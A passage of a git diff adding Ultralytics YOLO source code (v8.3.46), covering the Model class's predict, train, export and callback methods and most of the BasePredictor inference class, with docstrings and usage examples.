List[Results]: + """ + Performs predictions on the given image source using the YOLO model. + + This method facilitates the prediction process, allowing various configurations through keyword arguments. + It supports predictions with custom predictors or the default predictor method. The method handles different + types of image sources and can operate in a streaming mode. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source + of the image(s) to make predictions on. Accepts various types including file paths, URLs, PIL + images, numpy arrays, and torch tensors. + stream (bool): If True, treats the input source as a continuous stream for predictions. + predictor (BasePredictor | None): An instance of a custom predictor class for making predictions. + If None, the method uses a default predictor. + **kwargs (Any): Additional keyword arguments for configuring the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict(source="path/to/image.jpg", conf=0.25) + >>> for r in results: + ... print(r.boxes.data) # print detection bounding boxes + + Notes: + - If 'source' is not provided, it defaults to the ASSETS constant with a warning. + - The method sets up a new predictor if not already present and updates its arguments with each call. + - For SAM-type models, 'prompts' can be passed as a keyword argument. + """ + if source is None: + source = ASSETS + LOGGER.warning(f"WARNING ⚠️ 'source' is missing. Using 'source={source}'.") + + is_cli = (ARGV[0].endswith("yolo") or ARGV[0].endswith("ultralytics")) and any( + x in ARGV for x in ("predict", "track", "mode=predict", "mode=track") + ) + + custom = {"conf": 0.25, "batch": 1, "save": is_cli, "mode": "predict"} # method defaults + args = {**self.overrides, **custom, **kwargs} # highest priority args on the right + prompts = args.pop("prompts", None) # for SAM-type models + + if not self.predictor: + self.predictor = (predictor or self._smart_load("predictor"))(overrides=args, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=is_cli) + else: # only update args if predictor is already setup + self.predictor.args = get_cfg(self.predictor.args, args) + if "project" in args or "name" in args: + self.predictor.save_dir = get_save_dir(self.predictor.args) + if prompts and hasattr(self.predictor, "set_prompts"): # for SAM-type models + self.predictor.set_prompts(prompts) + return self.predictor.predict_cli(source=source) if is_cli else self.predictor(source=source, stream=stream) + + def track( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + persist: bool = False, + **kwargs, + ) -> List[Results]: + """ + Conducts object tracking on the specified input source using the registered trackers. + + This method performs object tracking using the model's predictors and optionally registered trackers. It handles + various input sources such as file paths or video streams, and supports customization through keyword arguments. + The method registers trackers if not already present and can persist them between calls. + + Args: + source (Union[str, Path, int, List, Tuple, np.ndarray, torch.Tensor], optional): Input source for object + tracking. Can be a file path, URL, or video stream. + stream (bool): If True, treats the input source as a continuous video stream. Defaults to False. + persist (bool): If True, persists trackers between different calls to this method. Defaults to False. + **kwargs (Any): Additional keyword arguments for configuring the tracking process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of tracking results, each a Results object. + + Raises: + AttributeError: If the predictor does not have registered trackers. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.track(source="path/to/video.mp4", show=True) + >>> for r in results: + ... print(r.boxes.id) # print tracking IDs + + Notes: + - This method sets a default confidence threshold of 0.1 for ByteTrack-based tracking. + - The tracking mode is explicitly set in the keyword arguments. + - Batch size is set to 1 for tracking in videos. + """ + if not hasattr(self.predictor, "trackers"): + from ultralytics.trackers import register_tracker + + register_tracker(self, persist) + kwargs["conf"] = kwargs.get("conf") or 0.1 # ByteTrack-based method needs low confidence predictions as input + kwargs["batch"] = kwargs.get("batch") or 1 # batch-size 1 for tracking in videos + kwargs["mode"] = "track" + return self.predict(source=source, stream=stream, **kwargs) + + def val( + self, + validator=None, + **kwargs, + ): + """ + Validates the model using a specified dataset and validation configuration. + + This method facilitates the model validation process, allowing for customization through various settings. It + supports validation with a custom validator or the default validation approach. The method combines default + configurations, method-specific defaults, and user-provided arguments to configure the validation process. + + Args: + validator (ultralytics.engine.validator.BaseValidator | None): An instance of a custom validator class for + validating the model. + **kwargs (Any): Arbitrary keyword arguments for customizing the validation process. + + Returns: + (ultralytics.utils.metrics.DetMetrics): Validation metrics obtained from the validation process. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.val(data="coco8.yaml", imgsz=640) + >>> print(results.box.map) # Print mAP50-95 + """ + custom = {"rect": True} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "val"} # highest priority args on the right + + validator = (validator or self._smart_load("validator"))(args=args, _callbacks=self.callbacks) + validator(model=self.model) + self.metrics = validator.metrics + return validator.metrics + + def benchmark( + self, + **kwargs, + ): + """ + Benchmarks the model across various export formats to evaluate performance. + + This method assesses the model's performance in different export formats, such as ONNX, TorchScript, etc. + It uses the 'benchmark' function from the ultralytics.utils.benchmarks module. The benchmarking is + configured using a combination of default configuration values, model-specific arguments, method-specific + defaults, and any additional user-provided keyword arguments. + + Args: + **kwargs (Any): Arbitrary keyword arguments to customize the benchmarking process. These are combined with + default configurations, model-specific arguments, and method defaults. Common options include: + - data (str): Path to the dataset for benchmarking. + - imgsz (int | List[int]): Image size for benchmarking. + - half (bool): Whether to use half-precision (FP16) mode. + - int8 (bool): Whether to use int8 precision mode. + - device (str): Device to run the benchmark on (e.g., 'cpu', 'cuda'). + - verbose (bool): Whether to print detailed benchmark information. + + Returns: + (Dict): A dictionary containing the results of the benchmarking process, including metrics for + different export formats. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.benchmark(data="coco8.yaml", imgsz=640, half=True) + >>> print(results) + """ + self._check_is_pytorch_model() + from ultralytics.utils.benchmarks import benchmark + + custom = {"verbose": False} # method defaults + args = {**DEFAULT_CFG_DICT, **self.model.args, **custom, **kwargs, "mode": "benchmark"} + return benchmark( + model=self, + data=kwargs.get("data"), # if no 'data' argument passed set data=None for default datasets + imgsz=args["imgsz"], + half=args["half"], + int8=args["int8"], + device=args["device"], + verbose=kwargs.get("verbose"), + ) + + def export( + self, + **kwargs, + ) -> str: + """ + Exports the model to a different format suitable for deployment. + + This method facilitates the export of the model to various formats (e.g., ONNX, TorchScript) for deployment + purposes. It uses the 'Exporter' class for the export process, combining model-specific overrides, method + defaults, and any additional arguments provided. + + Args: + **kwargs (Dict): Arbitrary keyword arguments to customize the export process. These are combined with + the model's overrides and method defaults. Common arguments include: + format (str): Export format (e.g., 'onnx', 'engine', 'coreml'). + half (bool): Export model in half-precision. + int8 (bool): Export model in int8 precision. + device (str): Device to run the export on. + workspace (int): Maximum memory workspace size for TensorRT engines. + nms (bool): Add Non-Maximum Suppression (NMS) module to model. + simplify (bool): Simplify ONNX model. + + Returns: + (str): The path to the exported model file. + + Raises: + AssertionError: If the model is not a PyTorch model. + ValueError: If an unsupported export format is specified. + RuntimeError: If the export process fails due to errors. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.export(format="onnx", dynamic=True, simplify=True) + 'path/to/exported/model.onnx' + """ + self._check_is_pytorch_model() + from .exporter import Exporter + + custom = { + "imgsz": self.model.args["imgsz"], + "batch": 1, + "data": None, + "device": None, # reset to avoid multi-GPU errors + "verbose": False, + } # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "export"} # highest priority args on the right + return Exporter(overrides=args, _callbacks=self.callbacks)(model=self.model) + + def train( + self, + trainer=None, + **kwargs, + ): + """ + Trains the model using the specified dataset and training configuration. + + This method facilitates model training with a range of customizable settings. It supports training with a + custom trainer or the default training approach. The method handles scenarios such as resuming training + from a checkpoint, integrating with Ultralytics HUB, and updating model and configuration after training. + + When using Ultralytics HUB, if the session has a loaded model, the method prioritizes HUB training + arguments and warns if local arguments are provided. It checks for pip updates and combines default + configurations, method-specific defaults, and user-provided arguments to configure the training process. + + Args: + trainer (BaseTrainer | None): Custom trainer instance for model training. If None, uses default. + **kwargs (Any): Arbitrary keyword arguments for training configuration. Common options include: + data (str): Path to dataset configuration file. + epochs (int): Number of training epochs. + batch_size (int): Batch size for training. + imgsz (int): Input image size. + device (str): Device to run training on (e.g., 'cuda', 'cpu'). + workers (int): Number of worker threads for data loading. + optimizer (str): Optimizer to use for training. + lr0 (float): Initial learning rate. + patience (int): Epochs to wait for no observable improvement for early stopping of training. + + Returns: + (Dict | None): Training metrics if available and training is successful; otherwise, None. + + Raises: + AssertionError: If the model is not a PyTorch model. + PermissionError: If there is a permission issue with the HUB session. + ModuleNotFoundError: If the HUB SDK is not installed. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.train(data="coco8.yaml", epochs=3) + """ + self._check_is_pytorch_model() + if hasattr(self.session, "model") and self.session.model.id: # Ultralytics HUB session with loaded model + if any(kwargs): + LOGGER.warning("WARNING ⚠️ using HUB training arguments, ignoring local training arguments.") + kwargs = self.session.train_args # overwrite kwargs + + checks.check_pip_update_available() + + overrides = yaml_load(checks.check_yaml(kwargs["cfg"])) if kwargs.get("cfg") else self.overrides + custom = { + # NOTE: handle the case when 'cfg' includes 'data'. + "data": overrides.get("data") or DEFAULT_CFG_DICT["data"] or TASK2DATA[self.task], + "model": self.overrides["model"], + "task": self.task, + } # method defaults + args = {**overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + if args.get("resume"): + args["resume"] = self.ckpt_path + + self.trainer = (trainer or self._smart_load("trainer"))(overrides=args, _callbacks=self.callbacks) + if not args.get("resume"): # manually set model only if not resuming + self.trainer.model = self.trainer.get_model(weights=self.model if self.ckpt else None, cfg=self.model.yaml) + self.model = self.trainer.model + + self.trainer.hub_session = self.session # attach optional HUB session + self.trainer.train() + # Update model and cfg after training + if RANK in {-1, 0}: + ckpt = self.trainer.best if self.trainer.best.exists() else self.trainer.last + self.model, _ = attempt_load_one_weight(ckpt) + self.overrides = self.model.args + self.metrics = getattr(self.trainer.validator, "metrics", None) # TODO: no metrics returned by DDP + return self.metrics + + def tune( + self, + use_ray=False, + iterations=10, + *args, + **kwargs, + ): + """ + Conducts hyperparameter tuning for the model, with an option to use Ray Tune. + + This method supports two modes of hyperparameter tuning: using Ray Tune or a custom tuning method. + When Ray Tune is enabled, it leverages the 'run_ray_tune' function from the ultralytics.utils.tuner module. + Otherwise, it uses the internal 'Tuner' class for tuning. The method combines default, overridden, and + custom arguments to configure the tuning process. + + Args: + use_ray (bool): If True, uses Ray Tune for hyperparameter tuning. Defaults to False. + iterations (int): The number of tuning iterations to perform. Defaults to 10. + *args (List): Variable length argument list for additional arguments. + **kwargs (Dict): Arbitrary keyword arguments. These are combined with the model's overrides and defaults. + + Returns: + (Dict): A dictionary containing the results of the hyperparameter search. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.tune(use_ray=True, iterations=20) + >>> print(results) + """ + self._check_is_pytorch_model() + if use_ray: + from ultralytics.utils.tuner import run_ray_tune + + return run_ray_tune(self, max_samples=iterations, *args, **kwargs) + else: + from .tuner import Tuner + + custom = {} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + return Tuner(args=args, _callbacks=self.callbacks)(model=self, iterations=iterations) + + def _apply(self, fn) -> "Model": + """ + Applies a function to model tensors that are not parameters or registered buffers. + + This method extends the functionality of the parent class's _apply method by additionally resetting the + predictor and updating the device in the model's overrides. It's typically used for operations like + moving the model to a different device or changing its precision. + + Args: + fn (Callable): A function to be applied to the model's tensors. This is typically a method like + to(), cpu(), cuda(), half(), or float(). + + Returns: + (Model): The model instance with the function applied and updated attributes. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = model._apply(lambda t: t.cuda()) # Move model to GPU + """ + self._check_is_pytorch_model() + self = super()._apply(fn) # noqa + self.predictor = None # reset predictor as device may have changed + self.overrides["device"] = self.device # was str(self.device) i.e. device(type='cuda', index=0) -> 'cuda:0' + return self + + @property + def names(self) -> Dict[int, str]: + """ + Retrieves the class names associated with the loaded model. + + This property returns the class names if they are defined in the model. It checks the class names for validity + using the 'check_class_names' function from the ultralytics.nn.autobackend module. If the predictor is not + initialized, it sets it up before retrieving the names. + + Returns: + (Dict[int, str]): A dict of class names associated with the model. + + Raises: + AttributeError: If the model or predictor does not have a 'names' attribute. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.names) + {0: 'person', 1: 'bicycle', 2: 'car', ...} + """ + from ultralytics.nn.autobackend import check_class_names + + if hasattr(self.model, "names"): + return check_class_names(self.model.names) + if not self.predictor: # export formats will not have predictor defined until predict() is called + self.predictor = self._smart_load("predictor")(overrides=self.overrides, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=False) + return self.predictor.model.names + + @property + def device(self) -> torch.device: + """ + Retrieves the device on which the model's parameters are allocated. + + This property determines the device (CPU or GPU) where the model's parameters are currently stored. It is + applicable only to models that are instances of nn.Module. + + Returns: + (torch.device): The device (CPU/GPU) of the model. + + Raises: + AttributeError: If the model is not a PyTorch nn.Module instance. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.device) + device(type='cuda', index=0) # if CUDA is available + >>> model = model.to("cpu") + >>> print(model.device) + device(type='cpu') + """ + return next(self.model.parameters()).device if isinstance(self.model, nn.Module) else None + + @property + def transforms(self): + """ + Retrieves the transformations applied to the input data of the loaded model. + + This property returns the transformations if they are defined in the model. The transforms + typically include preprocessing steps like resizing, normalization, and data augmentation + that are applied to input data before it is fed into the model. + + Returns: + (object | None): The transform object of the model if available, otherwise None. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> transforms = model.transforms + >>> if transforms: + ... print(f"Model transforms: {transforms}") + ... else: + ... print("No transforms defined for this model.") + """ + return self.model.transforms if hasattr(self.model, "transforms") else None + + def add_callback(self, event: str, func) -> None: + """ + Adds a callback function for a specified event. + + This method allows registering custom callback functions that are triggered on specific events during + model operations such as training or inference. Callbacks provide a way to extend and customize the + behavior of the model at various stages of its lifecycle. + + Args: + event (str): The name of the event to attach the callback to. Must be a valid event name recognized + by the Ultralytics framework. + func (Callable): The callback function to be registered. This function will be called when the + specified event occurs. + + Raises: + ValueError: If the event name is not recognized or is invalid. + + Examples: + >>> def on_train_start(trainer): + ... print("Training is starting!") + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", on_train_start) + >>> model.train(data="coco8.yaml", epochs=1) + """ + self.callbacks[event].append(func) + + def clear_callback(self, event: str) -> None: + """ + Clears all callback functions registered for a specified event. + + This method removes all custom and default callback functions associated with the given event. + It resets the callback list for the specified event to an empty list, effectively removing all + registered callbacks for that event. + + Args: + event (str): The name of the event for which to clear the callbacks. This should be a valid event name + recognized by the Ultralytics callback system. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", lambda: print("Training started")) + >>> model.clear_callback("on_train_start") + >>> # All callbacks for 'on_train_start' are now removed + + Notes: + - This method affects both custom callbacks added by the user and default callbacks + provided by the Ultralytics framework. + - After calling this method, no callbacks will be executed for the specified event + until new ones are added. + - Use with caution as it removes all callbacks, including essential ones that might + be required for proper functioning of certain operations. + """ + self.callbacks[event] = [] + + def reset_callbacks(self) -> None: + """ + Resets all callbacks to their default functions. + + This method reinstates the default callback functions for all events, removing any custom callbacks that were + previously added. It iterates through all default callback events and replaces the current callbacks with the + default ones. + + The default callbacks are defined in the 'callbacks.default_callbacks' dictionary, which contains predefined + functions for various events in the model's lifecycle, such as on_train_start, on_epoch_end, etc. + + This method is useful when you want to revert to the original set of callbacks after making custom + modifications, ensuring consistent behavior across different runs or experiments. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", custom_function) + >>> model.reset_callbacks() + # All callbacks are now reset to their default functions + """ + for event in callbacks.default_callbacks.keys(): + self.callbacks[event] = [callbacks.default_callbacks[event][0]] + + @staticmethod + def _reset_ckpt_args(args: dict) -> dict: + """ + Resets specific arguments when loading a PyTorch model checkpoint. + + This static method filters the input arguments dictionary to retain only a specific set of keys that are + considered important for model loading. It's used to ensure that only relevant arguments are preserved + when loading a model from a checkpoint, discarding any unnecessary or potentially conflicting settings. + + Args: + args (dict): A dictionary containing various model arguments and settings. + + Returns: + (dict): A new dictionary containing only the specified include keys from the input arguments. + + Examples: + >>> original_args = {"imgsz": 640, "data": "coco.yaml", "task": "detect", "batch": 16, "epochs": 100} + >>> reset_args = Model._reset_ckpt_args(original_args) + >>> print(reset_args) + {'imgsz': 640, 'data': 'coco.yaml', 'task': 'detect'} + """ + include = {"imgsz", "data", "task", "single_cls"} # only remember these arguments when loading a PyTorch model + return {k: v for k, v in args.items() if k in include} + + # def __getattr__(self, attr): + # """Raises error if object has no requested attribute.""" + # name = self.__class__.__name__ + # raise AttributeError(f"'{name}' object has no attribute '{attr}'. See valid attributes below.\n{self.__doc__}") + + def _smart_load(self, key: str): + """ + Loads the appropriate module based on the model task. + + This method dynamically selects and returns the correct module (model, trainer, validator, or predictor) + based on the current task of the model and the provided key. It uses the task_map attribute to determine + the correct module to load. + + Args: + key (str): The type of module to load. Must be one of 'model', 'trainer', 'validator', or 'predictor'. + + Returns: + (object): The loaded module corresponding to the specified key and current task. + + Raises: + NotImplementedError: If the specified key is not supported for the current task. + + Examples: + >>> model = Model(task="detect") + >>> predictor = model._smart_load("predictor") + >>> trainer = model._smart_load("trainer") + + Notes: + - This method is typically used internally by other methods of the Model class. + - The task_map attribute should be properly initialized with the correct mappings for each task. + """ + try: + return self.task_map[self.task][key] + except Exception as e: + name = self.__class__.__name__ + mode = inspect.stack()[1][3] # get the function name. + raise NotImplementedError( + emojis(f"WARNING ⚠️ '{name}' model does not support '{mode}' mode for '{self.task}' task yet.") + ) from e + + @property + def task_map(self) -> dict: + """ + Provides a mapping from model tasks to corresponding classes for different modes. + + This property method returns a dictionary that maps each supported task (e.g., detect, segment, classify) + to a nested dictionary. The nested dictionary contains mappings for different operational modes + (model, trainer, validator, predictor) to their respective class implementations. + + The mapping allows for dynamic loading of appropriate classes based on the model's task and the + desired operational mode. This facilitates a flexible and extensible architecture for handling + various tasks and modes within the Ultralytics framework. + + Returns: + (Dict[str, Dict[str, Any]]): A dictionary where keys are task names (str) and values are + nested dictionaries. Each nested dictionary has keys 'model', 'trainer', 'validator', and + 'predictor', mapping to their respective class implementations. + + Examples: + >>> model = Model() + >>> task_map = model.task_map + >>> detect_class_map = task_map["detect"] + >>> segment_class_map = task_map["segment"] + + Note: + The actual implementation of this method may vary depending on the specific tasks and + classes supported by the Ultralytics framework. The docstring provides a general + description of the expected behavior and structure. + """ + raise NotImplementedError("Please provide task map for your model!") + + def eval(self): + """ + Sets the model to evaluation mode. + + This method changes the model's mode to evaluation, which affects layers like dropout and batch normalization + that behave differently during training and evaluation. + + Returns: + (Model): The model instance with evaluation mode set. + + Examples: + >> model = YOLO("yolo11n.pt") + >> model.eval() + """ + self.model.eval() + return self + + def __getattr__(self, name): + """ + Enables accessing model attributes directly through the Model class. + + This method provides a way to access attributes of the underlying model directly through the Model class + instance. It first checks if the requested attribute is 'model', in which case it returns the model from + the module dictionary. Otherwise, it delegates the attribute lookup to the underlying model. + + Args: + name (str): The name of the attribute to retrieve. + + Returns: + (Any): The requested attribute value. + + Raises: + AttributeError: If the requested attribute does not exist in the model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.stride) + >>> print(model.task) + """ + if name == "model": + return self._modules["model"] + return getattr(self.model, name) diff --git a/2024.ultralytics/v8.3.46/engine/predictor.py b/2024.ultralytics/v8.3.46/engine/predictor.py new file mode 100644 index 0000000..c525016 --- /dev/null +++ b/2024.ultralytics/v8.3.46/engine/predictor.py @@ -0,0 +1,408 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Run prediction on images, videos, directories, globs, YouTube, webcam, streams, etc. + +Usage - sources: + $ yolo mode=predict model=yolov8n.pt source=0 # webcam + img.jpg # image + vid.mp4 # video + screen # screenshot + path/ # directory + list.txt # list of images + list.streams # list of streams + 'path/*.jpg' # glob + 'https://youtu.be/LNwODJXcvt4' # YouTube + 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP, TCP stream + +Usage - formats: + $ yolo mode=predict model=yolov8n.pt # PyTorch + yolov8n.torchscript # TorchScript + yolov8n.onnx # ONNX Runtime or OpenCV DNN with dnn=True + yolov8n_openvino_model # OpenVINO + yolov8n.engine # TensorRT + yolov8n.mlpackage # CoreML (macOS-only) + yolov8n_saved_model # TensorFlow SavedModel + yolov8n.pb # TensorFlow GraphDef + yolov8n.tflite # TensorFlow Lite + yolov8n_edgetpu.tflite # TensorFlow Edge TPU + yolov8n_paddle_model # PaddlePaddle + yolov8n.mnn # MNN + yolov8n_ncnn_model # NCNN +""" + +import platform +import re +import threading +from pathlib import Path + +import cv2 +import numpy as np +import torch + +from ultralytics.cfg import get_cfg, get_save_dir +from ultralytics.data import load_inference_source +from ultralytics.data.augment import LetterBox, classify_transforms +from ultralytics.nn.autobackend import AutoBackend +from ultralytics.utils import DEFAULT_CFG, LOGGER, MACOS, WINDOWS, callbacks, colorstr, ops +from ultralytics.utils.checks import check_imgsz, check_imshow +from ultralytics.utils.files import increment_path +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +STREAM_WARNING = """ +WARNING ⚠️ inference results will accumulate in RAM unless `stream=True` is passed, causing potential out-of-memory +errors for large sources or long-running streams and videos. See https://docs.ultralytics.com/modes/predict/ for help. + +Example: + results = model(source=..., stream=True) # generator of Results objects + for r in results: + boxes = r.boxes # Boxes object for bbox outputs + masks = r.masks # Masks object for segment masks outputs + probs = r.probs # Class probabilities for classification outputs +""" + + +class BasePredictor: + """ + BasePredictor. + + A base class for creating predictors. + + Attributes: + args (SimpleNamespace): Configuration for the predictor. + save_dir (Path): Directory to save results. + done_warmup (bool): Whether the predictor has finished setup. + model (nn.Module): Model used for prediction. + data (dict): Data configuration. + device (torch.device): Device used for prediction. + dataset (Dataset): Dataset used for prediction. + vid_writer (dict): Dictionary of {save_path: video_writer, ...} writer for saving video output. + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initializes the BasePredictor class. + + Args: + cfg (str, optional): Path to a configuration file. Defaults to DEFAULT_CFG. + overrides (dict, optional): Configuration overrides. Defaults to None. + """ + self.args = get_cfg(cfg, overrides) + self.save_dir = get_save_dir(self.args) + if self.args.conf is None: + self.args.conf = 0.25 # default conf=0.25 + self.done_warmup = False + if self.args.show: + self.args.show = check_imshow(warn=True) + + # Usable if setup is done + self.model = None + self.data = self.args.data # data_dict + self.imgsz = None + self.device = None + self.dataset = None + self.vid_writer = {} # dict of {save_path: video_writer, ...} + self.plotted_img = None + self.source_type = None + self.seen = 0 + self.windows = [] + self.batch = None + self.results = None + self.transforms = None + self.callbacks = _callbacks or callbacks.get_default_callbacks() + self.txt_path = None + self._lock = threading.Lock() # for automatic thread-safe inference + callbacks.add_integration_callbacks(self) + + def preprocess(self, im): + """ + Prepares input image before inference. + + Args: + im (torch.Tensor | List(np.ndarray)): BCHW for tensor, [(HWC) x B] for list. + """ + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW, (n, 3, h, w) + im = np.ascontiguousarray(im) # contiguous + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() # uint8 to fp16/32 + if not_tensor: + im /= 255 # 0 - 255 to 0.0 - 1.0 + return im + + def inference(self, im, *args, **kwargs): + """Runs inference on a given image using the specified model and arguments.""" + visualize = ( + increment_path(self.save_dir / Path(self.batch[0][0]).stem, mkdir=True) + if self.args.visualize and (not self.source_type.tensor) + else False + ) + return self.model(im, augment=self.args.augment, visualize=visualize, embed=self.args.embed, *args, **kwargs) + + def pre_transform(self, im): + """ + Pre-transform input image before inference. + + Args: + im (List(np.ndarray)): (N, 3, h, w) for tensor, [(h, w, 3) x N] for list. + + Returns: + (list): A list of transformed images. + """ + same_shapes = len({x.shape for x in im}) == 1 + letterbox = LetterBox( + self.imgsz, + auto=same_shapes and (self.model.pt or (getattr(self.model, "dynamic", False) and not self.model.imx)), + stride=self.model.stride, + ) + return [letterbox(image=x) for x in im] + + def postprocess(self, preds, img, orig_imgs): + """Post-processes predictions for an image and returns them.""" + return preds + + def __call__(self, source=None, model=None, stream=False, *args, **kwargs): + """Performs inference on an image or stream.""" + self.stream = stream + if stream: + return self.stream_inference(source, model, *args, **kwargs) + else: + return list(self.stream_inference(source, model, *args, **kwargs)) # merge list of Result into one + + def predict_cli(self, source=None, model=None): + """ + Method used for Command Line Interface (CLI) prediction. + + This function is designed to run predictions using the CLI. It sets up the source and model, then processes + the inputs in a streaming manner. This method ensures that no outputs accumulate in memory by consuming the + generator without storing results. + + Note: + Do not modify this function or remove the generator. The generator ensures that no outputs are + accumulated in memory, which is critical for preventing memory issues during long-running predictions. + """ + gen = self.stream_inference(source, model) + for _ in gen: # sourcery skip: remove-empty-nested-block, noqa + pass + + def setup_source(self, source): + """Sets up source and inference mode.""" + self.imgsz = check_imgsz(self.args.imgsz, stride=self.model.stride, min_dim=2) # check image size + self.transforms = ( + getattr( + self.model.model, + "transforms", + classify_transforms(self.imgsz[0], crop_fraction=self.args.crop_fraction), + ) + if self.args.task == "classify" + else None + ) + self.dataset = load_inference_source( + source=source, + batch=self.args.batch, + vid_stride=self.args.vid_stride, + buffer=self.args.stream_buffer, + ) + self.source_type = self.dataset.source_type + if not getattr(self, "stream", True) and ( + self.source_type.stream + or self.source_type.screenshot + or len(self.dataset) > 1000 # many images + or any(getattr(self.dataset, "video_flag", [False])) + ): # videos + LOGGER.warning(STREAM_WARNING) + self.vid_writer = {} + + @smart_inference_mode() + def stream_inference(self, source=None, model=None, *args, **kwargs): + """Streams real-time inference on camera feed and saves results to file.""" + if self.args.verbose: + LOGGER.info("") + + # Setup model + if not self.model: + self.setup_model(model) + + with self._lock: # for thread-safe inference + # Setup source every time predict is called + self.setup_source(source if source is not None else self.args.source) + + # Check if save_dir/ label file exists + if self.args.save or self.args.save_txt: + (self.save_dir / "labels" if self.args.save_txt else self.save_dir).mkdir(parents=True, exist_ok=True) + + # Warmup model + if not self.done_warmup: + self.model.warmup(imgsz=(1 if self.model.pt or self.model.triton else self.dataset.bs, 3, *self.imgsz)) + self.done_warmup = True + + self.seen, self.windows, self.batch = 0, [], None + profilers = ( + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ) + self.run_callbacks("on_predict_start") + for self.batch in self.dataset: + self.run_callbacks("on_predict_batch_start") + paths, im0s, s = self.batch + + # Preprocess + with profilers[0]: + im = self.preprocess(im0s) + + # Inference + with profilers[1]: + preds = self.inference(im, *args, **kwargs) + if self.args.embed: + yield from [preds] if isinstance(preds, torch.Tensor) else preds # yield embedding tensors + continue + + # Postprocess + with profilers[2]: + self.results = self.postprocess(preds, im, im0s) + self.run_callbacks("on_predict_postprocess_end") + + # Visualize, save, write results + n = len(im0s) + for i in range(n): + self.seen += 1 + self.results[i].speed = { + "preprocess": profilers[0].dt * 1e3 / n, + "inference": profilers[1].dt * 1e3 / n, + "postprocess": profilers[2].dt * 1e3 / n, + } + if self.args.verbose or self.args.save or self.args.save_txt or self.args.show: + s[i] += self.write_results(i, Path(paths[i]), im, s) + + # Print batch results + if self.args.verbose: + LOGGER.info("\n".join(s)) + + self.run_callbacks("on_predict_batch_end") + yield from self.results + + # Release assets + for v in self.vid_writer.values(): + if isinstance(v, cv2.VideoWriter): + v.release() + + # Print final results + if self.args.verbose and self.seen: + t = tuple(x.t / self.seen * 1e3 for x in profilers) # speeds per image + LOGGER.info( + f"Speed: %.1fms preprocess, %.1fms inference, %.1fms postprocess per image at shape " + f"{(min(self.args.batch, self.seen), 3, *im.shape[2:])}" % t + ) + if self.args.save or self.args.save_txt or self.args.save_crop: + nl = len(list(self.save_dir.glob("labels/*.txt"))) # number of labels + s = f"\n{nl} label{'s' * (nl > 1)} saved to {self.save_dir / 'labels'}" if self.args.save_txt else "" + LOGGER.info(f"Results saved to {colorstr('bold', self.save_dir)}{s}") + self.run_callbacks("on_predict_end") + + def setup_model(self, model, verbose=True): + """Initialize YOLO model with given parameters and set it to evaluation mode.""" + self.model = AutoBackend( + weights=model or self.args.model, + device=select_device(self.args.device, verbose=verbose), + dnn=self.args.dnn, + data=self.args.data, + fp16=self.args.half, + batch=self.args.batch, + fuse=True, + verbose=verbose, + ) + + self.device = self.model.device # update device + self.args.half = self.model.fp16 # update half + self.model.eval() + + def write_results(self, i, p, im, s): + """Write inference results to a file or directory.""" + string = "" # print string + if len(im.shape) == 3: + im = im[None] # expand for batch dim + if self.source_type.stream or self.source_type.from_img or self.source_type.tensor: # batch_size >= 1 + string += f"{i}: " + frame = self.dataset.count + else: + match = re.search(r"frame (\d+)/", s[i]) + frame = int(match[1]) if match else None # 0 if frame undetermined + + self.txt_path = self.save_dir / "labels" / (p.stem + ("" if self.dataset.mode == "image" else f"_{frame}")) + string += "{:g}x{:g} ".format(*im.shape[2:]) + result = self.results[i] + result.save_dir = self.save_dir.__str__() # used in other locations + string += f"{result.verbose()}{result.speed['inference']:.1f}ms" + + # Add predictions to image + if self.args.save or self.args.show: + self.plotted_img = result.plot( + line_width=self.args.line_width, + boxes=self.args.show_boxes, + conf=self.args.show_conf, + labels=self.args.show_labels, + im_gpu=None if self.args.retina_masks else im[i], + ) + + # Save results + if self.args.save_txt: + result.save_txt(f"{self.txt_path}.txt", save_conf=self.args.save_conf) + if self.args.save_crop: + result.save_crop(save_dir=self.save_dir / "crops", file_name=self.txt_path.stem) + if self.args.show: + self.show(str(p)) + if self.args.save: + self.save_predicted_images(str(self.save_dir / p.name), frame) + + return string + + def save_predicted_images(self, save_path="", frame=0): + """Save video predictions as mp4 at specified path.""" + im = self.plotted_img + + # Save videos and streams + if self.dataset.mode 